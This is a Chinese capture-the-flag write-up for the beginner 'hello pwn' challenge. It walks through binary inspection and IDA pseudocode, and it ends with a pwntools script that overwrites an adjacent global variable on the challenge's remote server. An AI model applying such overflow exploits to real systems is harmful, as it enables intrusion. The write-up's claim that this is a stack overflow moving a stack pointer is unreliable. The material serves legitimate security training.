攻防世界hello pwn WP（pwn入门基础题）-Toy模板网

这篇具有很好参考价值的文章主要介绍了攻防世界hello pwn WP（pwn入门基础题）。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

攻防世界hello pwn WP（pwn入门基础题）

题目网址：

攻防世界

下载文件，文件名太长了把文件改名为pwn

攻防世界hello pwn WP（pwn入门基础题）

把pwn文件放入kali里面

file一下查看文件类型

攻防世界hello pwn WP（pwn入门基础题）

发现是一个64位的elf文件，加个运行权限，运行一下看看

攻防世界hello pwn WP（pwn入门基础题）

使用 checksec 检查保护

攻防世界hello pwn WP（pwn入门基础题）

发现只开了 NX 保护。

把pwn放入64位IDA中，F5反汇编一下main函数

攻防世界hello pwn WP（pwn入门基础题）

得到main函数伪代码

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 0x10uLL);
  if ( dword_60106C == 1853186401 )
    sub_400686();
  return 0LL;
}

点击 read(0, &unk_601068, 0x10uLL);处的unk_601068

攻防世界hello pwn WP（pwn入门基础题）

发现这个要我们输入的变量在bss段处

bss段：通常是指用来存放程序中未初始化的全局变量和静态变量的一块内存区域。

关键语句是这个

if ( dword_60106C == 1853186401 )
sub_400686();

点击sub_400686();发现这个是获取flag的函数

攻防世界hello pwn WP（pwn入门基础题）

所以说题目就是想要当dword_60106C等于1853186401时，给我们flag

但是让我们输入的的变量名为unk_601068，我们正常输入是不能使dword_60106C等于1853186401的，我们要通过栈溢出，使dword_60106C等于1853186401。

我们从IDA中可以看出dword_60106C在unk_601068的下面，在计算机内存中变量应该是从下往上排列的，但是IDA为了符合我们喜欢向下看的习惯，把变量从上往下排了。我们只需要在输入unk_601068时，输入无关的数据，使得栈的指针指向60106C处，然后在此处输入1853186401。即可完成题目要求

攻防世界hello pwn WP（pwn入门基础题）

pwnpayload.：

from pwn import *
context(os='linux', arch="amd64", log_level="debug")
os = remote('61.147.171.105',61286)#填写远程连接的ip和端口
os.recvuntil('lets get helloworld for bof\n')#这里是运行程序将要接收到的文字
payload = b'a'*(0x6c-0x68) + p64(1853186401) #a是垃圾信息 p64指的是以64位打包
os.sendline(payload)
os.interactive()

攻防世界hello pwn WP（pwn入门基础题）文章来源地址https://www.toymoban.com/news/detail-498694.html